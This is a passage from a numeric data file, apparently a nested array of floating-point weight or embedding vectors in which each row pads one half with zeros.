0.118142, 0.085838, -0.546848, 0.12081, 0.00212243, -0.237015, -0.00165503, 0.0594733, 0.0251471, 0.00469006, -0.66407, -0.0412096, 0.151258, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.00869809, 0.0167576, -0.0706604, -0.0665272, 0.0179907, -0.0256223, 0.00635455, -0.0367019, 0.0354537, -0.0376332, 0.00509622, -0.0446084, 0.0165623, -0.00771416, 0.0401489, -0.017129, -0.0601624, 0.0353441, -0.0383042, -0.0198847, -0.0147165, 0.0344525, 0.0304548, -0.0477699, -0.0487352, 0.0259926, -0.0317255, -0.0609617, -0.00637658, -0.0292192, -0.0121426, -0.0275772, 0.0217314, 0.037275, 0.0147684, 0.0319494, 0.0141303, -0.0122977, 0.00516398, -0.0399522, -0.0238073, -0.0214366, -0.0204699, 0.0414033, -0.0390457, 0.00189087, -0.0235861, -0.0397219, -0.0321911, -0.00870085, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.729589, 0.112658, 0.675898, -0.336865, -0.254751, 0.0643379, 0.5021, -0.0538335, 0.0406053, -0.304894, -0.443825, 0.547255, 0.0599714, 0.0266899, -0.0958293, 0.168121, -0.11976, 0.682601, 0.0167635, 0.191461, 0.0479033, -0.453829, -0.310589, 0.37594, 0.0998549, 0.065714, 0.0612793, 0.0620632, -0.336486, -0.0673402, -0.168225, -0.00719133, 0.196643, 0.0446141, 0.987812, 0.0147727, 0.0702065, -0.0600722, -0.0627842, -0.163283, 0.430716, 0.00642575, -0.386826, 0.119625, -0.295568, 0.0170996, 0.0520095, -0.864364, 0.402763, -0.077015, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.247388, 0.792911, -0.132454, 0.161274, 1.14012, -0.329659, 0.353667, -0.589317, 0.024258, 1.27819, 0.0084919, 0.402595, -0.439306, -0.0192333, -0.998744, -0.463312, 0.073044, -0.255824, -0.00986245, -0.142528, -0.0191958, -0.612263, -1.38339, 0.444944, -0.017283, -0.16458, 0.0150944, -0.22909, 0.167663, -0.226227, -0.270657, -0.507354, -0.164545, 0.0969429, -1.20441, -0.0452849, -0.369099, -0.548998, 0.199264, 0.081023, 0.889728, 0.0200342, 1.00746, -0.0696541, -0.127238, -0.0270819, -0.0346142, 0.94756, -0.0552456, -0.210237, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.180807, -0.570626, 0.436743, -0.883083, -0.319819, -0.492644, -0.949463, 0.0384632, 0.0168526, -0.851796, -0.211086, -0.00168718, -0.168177, -0.00729817, -0.852042, 0.211964, -0.310566, -0.154219, 0.00407124, 0.380139, 0.00739629, -0.910222, -0.578126, -0.0988874, 0.0217413, 0.47989, 0.368369, -0.204906, 0.4492, -0.00464175, 0.226075, 0.552174, 0.207385, 0.885652, -0.948636, -0.0412515, 0.116175, 0.0694841, 0.330276, 0.202828, 0.235264, 0.0479741, -0.251403, 0.0993926, -0.426785, -0.0201418, 0.0234868, -0.802022, 0.278779, -0.168559, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.47892, 1.2871, -0.938928, 0.262533, 1.60644, -0.220725, 2.12993, 1.36376, -0.0329367, 0.714342, 1.39527, 0.227104, -0.321603, -0.041854, 2.93346, 1.69617, 0.745399, 0.527466, 0.0360963, 0.226359, -0.0248201, 1.37605, 0.759421, 0.168307, 0.115976, 1.17927, -0.653396, 0.0325196, -0.0497246, -1.37481, 0.57709, -0.0832312, -0.964925, 1.26421, 1.952, -0.0431341, 1.16608, -2.3457, 0.521465, 1.69015, -1.16953, 0.04511, -0.30578, -0.184225, -0.293229, -0.0365762, 0.02156, 1.56147, -2.06865, -0.928819, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.318507, 0.405146, -0.344651, 0.344257, -0.701639, 0.567023, 0.0466303, 0.245406, 0.0450979, -0.864855, -0.387773, 0.768798, -0.512714, 0.0102398, -0.00901638, -0.643767, 0.498701, 0.0399889, 0.00685545, 0.280909, -0.0281535, 0.651269, 0.881588, -0.34313, 0.00307558, 0.304569, -0.482396, 0.0760964, 0.98412, 0.115682, 0.259503, 0.175619, 0.389465, -1.42793, -2.08411, -0.0475116, 0.179477, 0.103614, 0.282592, -0.861473, 0.022265, -0.0157461, -0.605267, 0.0406237, -0.0566811, -0.0181706, -0.00611739, 0.0249707, -0.0539049, 0.881606, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.379815, -0.348553, -0.702222, -0.238573, -0.217435, -0.059657, 0.279486, 0.0613746, -0.0330884, 0.417958, -0.0895802, -0.784515, 0.195785, -0.0250295, 0.222762, 0.296419, -0.0392835, 0.497536, 0.044236, 0.0294126, -0.0181405, 0.973184, -0.163111, 0.0765692, 0.170353, 0.41911, -0.32013, 0.420475, 0.654433, 0.196752, 0.378422, -0.189982, -0.456989, 0.0161837, -0.227141, 0.024073, 0.162535, 0.157343, -0.00176002, 0.267483, 0.364821, 5.75713e-05, 0.160202, 0.104856, -0.280638, -0.0122689, -0.00935821, -0.0136912, -0.116335, 0.337038, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.047573, -0.70488, 0.232063, 0.541224, 0.458506, -0.779894, -3.45457, -1.34824, 0.0354759, -1.45502, 0.140387, 0.870942, -0.793585, -0.0213743, 0.4212, 0.312238, -0.00965672, 0.636229, -0.0245313, 0.541435, -0.0316692, 1.52162, -1.07882, -0.0211867, -0.00158622, -0.7712, 0.900012, -0.678212, -0.256284, -0.136088, 1.92318, 0.27123, -0.023535, 0.785091, 1.77769, -0.0213263, -1.29247, 0.817234, -1.84452, 0.862783, 0.582089, 0.0267654, 0.223323, -0.0470652, 1.42982, -0.025754, -0.0343958, 0.71102, 0.99479, -0.131373, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.3248, -0.221573, -0.406168, 0.10518, -0.125474, 0.155824, -0.224711, -0.074452, -0.0400846, 0.327342, 0.0935833, 0.182637, 0.123141, -0.0136812, -0.00554657, 0.792858, 0.271386, -0.00488239, -0.00785878, -0.015383, 0.0416131, 0.0901938, 0.0628613, 0.405325, 0.12679, 0.0699798, 0.216457, 0.232175, -0.0367014, -0.154477, 0.301841, -0.558342, 0.312232, -0.110182, -0.438168, -0.00279973, 0.0558491, -0.00240973, -0.71455, 0.32696, 0.0553501, -0.0107543, -0.58053, 0.336786, -0.763228, -0.0315338, 0.0151786, 0.70586, -0.105148, -0.149071, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.233203, 0.597924, 0.953182, -0.0631562, 0.149021, 0.317116, 1.05936, 0.130693, -0.0262191, 0.970469, -0.58721, 0.234683, -1.93941, 0.0288919, 0.477509, 0.00293881, -0.59627, -0.641149, -0.00850786, -6.70303, 0.0416499, 0.839323, 0.731295, -0.128357, 0.109185, 0.00228434, -0.123364, -0.347153, -0.0557835, -0.138923, -0.672376, -0.452155, -0.191763, 0.75671, -0.688873, -0.00482313, 0.515634, 0.958622, 0.403178, -4.32566, -0.65437, -0.0319576, 0.119383, 0.566239, 1.27925, -0.0111889, -0.0170054, -0.86881, -0.70697, 0.251926, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.155434, -0.191065, 0.300237, -0.695974, -0.0422566, -1.07844, -1.0108, -0.360752, 0.0232174, -0.0764677, 0.48081, -0.517659, 0.124161, 0.00877031, -0.274443, 0.529959, -0.063243, 0.18698, -0.0410105, -0.227958, 0.0383169, 0.454479, -2.20717, 0.0839593, 0.0312447, -0.172857, -0.0314626, -0.360908, -0.0738391, 0.298878, 0.43378, 0.0367582, 0.0239608, 0.933334, -0.796445, -0.0273918, 0.314589, 0.0850768, -0.295888, 0.451286, -0.527668, -0.048249, -0.196029, -0.378056, -0.121939, 0.00296019, -0.0387556, -3.05914, -0.372575, -0.655964, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.461724, 0.131362, -0.0425768, 0.374773, -0.915179, 0.379161, 0.00368916, -0.102593, -0.0460907, -0.242696, -0.134491, -0.136481, -0.00141838, 0.0181283, -0.099732, -0.405784, -0.700849, 0.99136, 0.016356, 0.0455019, 0.0143304, 0.344399, -0.109911, -0.269121, -0.0254067, -0.397228, -1.22223, 0.644826, 0.0372552, 0.254558, 0.0426138, 0.121017, 0.922693, -0.246025, -0.290803, -0.0256374, -0.148557, 0.0316936, 0.362693, 0.163417, -1.36517, 0.00515182, -0.13619, 0.102412, 0.318097, -0.00483493, 0.0351694, 1.30737, -0.530693, 0.369668, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.381176, -0.079171, -0.0490211, -1.06469, -0.118514, 0.0563829, 0.926405, 0.398699, 0.00560341, 0.282437, -0.105513, -0.246609, 0.693747, 0.0286104, -0.359853, -0.237607, 0.0874205, -1.10613, -0.0183909, 0.00826366, -0.00413797, -0.0522972, 0.543728, 0.0184169, 0.120149, -0.910594, 0.452024, 0.188213, 0.414705, -0.158489, 0.240072, 0.15236, -0.0073444, -0.251548, 0.158114, 0.0333444, -0.0916095, 0.387552, -0.408052, 0.129291, 0.0560133, -0.0257425, -0.343125, 0.0711024, 0.556055, 0.0145786, -0.00291634, 1.65468, 0.424408, -0.0409948, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.272, 0.512, 0.4226, -0.0321, -0.206, 0.3933, 0.804, 0.368, 0.0123, 0.1891, 0.2017, 0.6167, -0.02666, -0.00376, 0.3167, 0.4739, -0.0096, 0.2112, -0.03214, 0.01808, 0.02882, -1.792, -0.2178, -0.4133, 0.154, -0.2847, -0.1554, 0.4724, -0.1749, -0.416, 0.0214, -0.452, 0.4736, 1.221, -2.295, -0.02231, -0.2603, 0.2349, 0.2412, 0.3154, 0.2761, 0.01654, -0.3228, -0.06616, 0.741, 0.02562, 0.01242, 0.7686, 0.6484, -0.03253], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2462, -0.02374, 0.1655, -0.0853, 0.0974, 0.0181, -0.01947, 0.004566, 0.014534, -0.1683, 0.0932, -0.02272, 0.0485, 0.00995, 0.0681, -0.1337, -0.1499, 0.0439, 0.0249, -0.1182, -0.0526, 0.02737, -0.03464, 0.0559, 0.11835, -0.266, -0.08075, -0.2308, -0.2144, -0.0999, -0.2062, 0.0759, -0.249, 0.1459, -0.4058, -0.02232, -0.1489, -0.0858, -0.1544, 0.11707, -0.0007815, -0.002453, 0.1724, -0.064, 0.08704, 0.04126, 0.04297, 0.01445, 0.02135, -0.05728], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3481, 0.2754, -0.2769, 0.4307, 0.1659, 0.00954, 0.0204, -0.05957, -0.04285, 0.3887, -0.04132, -0.3198, -0.648, -0.005695, 0.1827, -0.1062, 0.04404, 0.7344, -0.0392, -0.0876, 0.04822, 0.10364, 1.163, 0.2029, 0.1157, -0.00846, -0.1098, 0.5576, 0.1192, -0.02289, 0.01068, -0.17, -0.441, -0.405, -0.1697, 0.02606, -0.4158, -0.01055, 0.475, 0.1487, 0.0393, 0.00588, 0.7305, -0.01089, 0.09845, -0.01572, 0.03723, 1.1, -0.01872, -0.302], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.579, 1.523, -0.02689, -1.751, -1.782, -0.721, 1.304, -0.08844, 0.02148, 1.606, -1.138, -0.3188, -0.619, -0.02492, 1.126, -0.365, -1.647, 1.939, -0.03824, -1.481, 0.02498, 1.227, -1.713, -0.886, 0.09784, -0.171, -0.2479, 0.328, 0.968, -0.578, -0.7603, 0.02051, -0.07623, -1.49, 3.574, 0.005917, -0.4368, 0.7407, 0.5693, -0.218, 0.6167, -0.02373, 0.4685, -0.0877, -0.91, -0.04892, 0.03302, -0.7866, 0.8706, 0.944], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3225, -0.07135, 0.6094, -0.581, 0.2433, 0.1981, 1.255, 0.0407, 0.03494, -0.2893, 0.3796, -0.02942, 0.05496, -0.03345, -0.542, -0.4568, -0.0619, 0.0169, 0.0397, 0.3252, -0.01113, 0.3494, -0.594, -0.01904, 0.003265, 0.562, -0.756, -0.3547, 0.6826, 0.754, 0.1528, 0.1581, 0.4744, 0.09863, -3.139, 0.03043, -0.0793, 0.37, -0.1316, -0.0318, -0.525, 0.0466, 0.5938, 0.0936, -0.229, 0.01756, 0.001359, -0.488, -0.5566, -0.4011], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.359, 1.078, 0.7437, 0.5347, 1.283, 0.6123, -1.077, -0.299, 0.01581, 0.8667, -0.944, 0.1731, 0.3635, -0.005314, 0.5396, 1.083, -0.1274, 0.567, -0.01056, 0.337, -0.0287, -0.2141, 0.5444, 0.2878, 0.1327, 0.00271, 0.1406, 0.5635, -0.3044, -0.505, 0.3296, -0.471, 0.2856, -0.9897, 0.1038, 0.006126, 0.2153, 0.4775, 0.2257, 1.185, 0.03848, -0.0387, 0.2311, 0.0307, -0.6855, -0.02625, -0.02716, 1.908, 0.9, -0.1622], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.188, 0.1092, 0.4258, -0.1155, 0.2346, -0.2551, 0.00539, -0.6245, 0.0212, -0.1823, 0.2067, 0.584, 0.1583, 0.001888, 0.5254, -0.09125, 0.2217, 0.479, 0.01483, -0.09845, -0.041, -0.3088, 0.1953, 0.05804, -0.06647, 0.1377, -0.1454, -0.1456, -0.4546, -0.2162, 0.2355, 0.05112, 0.4604, 0.7285, -1.1455, -0.02155, 0.0784, 0.1683, -0.3503, 0.1105, 0.5186, -0.00664, -0.326, -0.0696, -0.3691, -0.01614, 0.001441, 0.7017, 0.1993, -0.2915], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2742, -0.12036, -0.3315, -0.5645, -0.702, 0.191, 0.6655, 0.2429, 0.01302, -0.3992, -0.4595, 0.2502, 0.05197, 0.02182, -0.1218, 0.3308, -0.09955, 0.1444, 0.03497, 0.4172, 0.04886, 0.2812, -0.5317, 0.3745, 0.1311, 0.1177, -0.002731, 0.9224, 0.0957, 0.1687, 0.0777, 0.2429, -0.4155, -0.6143, 0.4941, 0.04324, 0.2778, 0.1677, -0.1047, -0.042, -0.972, -0.03546, -0.307, 0.163, 0.354, -0.01746, 0.01393, -1.877, -0.59, 0.2563], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3262, 1.382, 0.1628, -1.003, -2.562, -0.1646, 1.759, 0.12036, -0.04062, -0.874, -0.4263, 0.4834, -0.096, -0.01237, -0.2856, 0.1786, 0.2037, -0.244, 0.03247, 0.5366, -0.002325, -0.526, -0.1004, -0.1891, 0.1383, 0.5933, 0.2374, -0.512, 0.1065, -0.2365, -0.3376, -0.3494, -1.348, -0.876, -1.805, -0.04852, 0.2764, -0.3745, 0.1665, 0.0589, 0.0667, 0.00784, -0.06274, -0.0781, -0.02698, -0.02397, -0.009415, -0.8223, 0.062, -0.08295], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1869, 0.4666, -0.774, 0.1368, -0.2429, 0.04266, 0.4976, -0.2808, 0.001888, 0.03342, 0.11566, 0.4915, -0.05908, -0.04684, -1.967, 0.0829, -0.657, -1.043, 0.02534, -0.2234, -0.03885, -0.1409, 0.824, 0.241, 0.02858, 0.27, -0.06232, -0.06415, 0.04166, -0.424, -0.1952, -0.2566, -0.6265, 0.005608, -1.164, 0.04596, -0.007866, -0.00887, -0.342, 0.602, 0.1299, 0.02554, -0.3555, 0.00654, 0.333, 0.03168, -0.03574, 0.636, 0.4338, 0.1322], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1802, -1.755, -0.558, 0.4302, 0.1289, -0.5645, 1.942, 0.4653, 0.01991, -0.2544, 0.3035, -1.421, -2.824, -0.03099, -0.4456, -2.623, 1.125, -1.966, 0.01941, -0.4355, 0.03238, 0.1378, 2.014, -0.11914, -0.03577, -0.526, -0.4949, 0.3623, -0.472, 0.351, 0.5063, 0.008736, 0.4607, 0.1143, -1.799, -0.02103, 0.2856, 0.0867, -0.0428, 0.4197, -5.45, -0.03757, 0.1647, 0.5674, 0.7866, -0.04456, 0.02464, 1.846, -1.12, -0.0437], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0882, -1.328, -0.11694, -0.3472, 0.1691, 0.04465, -2.627, -1.487, 0.004898, -0.3286, -0.079, 0.2238, -0.6934, 0.02528, 0.5063, -0.05374, 0.999, -0.776, 0.0009284, 0.06635, -0.02888, 0.1779, 0.345, -0.3555, 0.00437, -0.887, 0.8003, -0.2615, -0.6274, -0.0071, -0.0855, 0.007812, 1.073, -0.9033, -0.6855, -0.00852, 0.1959, 0.4045, 0.4622, -0.3103, 0.6387, -0.02963, -0.841, 0.2727, 1.288, -0.04062, -0.035, -0.6772, 0.3196, 0.0783], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.07855, 0.6567, -0.04376, -0.3833, -0.2463, 0.2896, 0.3328, -1.503, -0.010254, 0.2761, -0.4727, -0.736, 0.12067, -0.0372, -0.04242, 0.3945, 1.09, -0.4841, 0.0329, 0.1132, -0.014694, 0.3865, 0.3955, -0.1873, -0.004284, -0.7085, -0.485, -0.2211, 0.0996, 0.4978, 0.3713, 0.475, -0.0661, -1.973, -0.8057, -0.009674, 0.5225, -0.1318, 0.0737, -0.7744, -0.846, 0.01776, 0.2612, 0.644, -0.2488, -0.02705, -0.03778, 0.2118, 0.191, 0.02875], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3367, 0.5825, -0.5474, 0.6123, -0.8047, 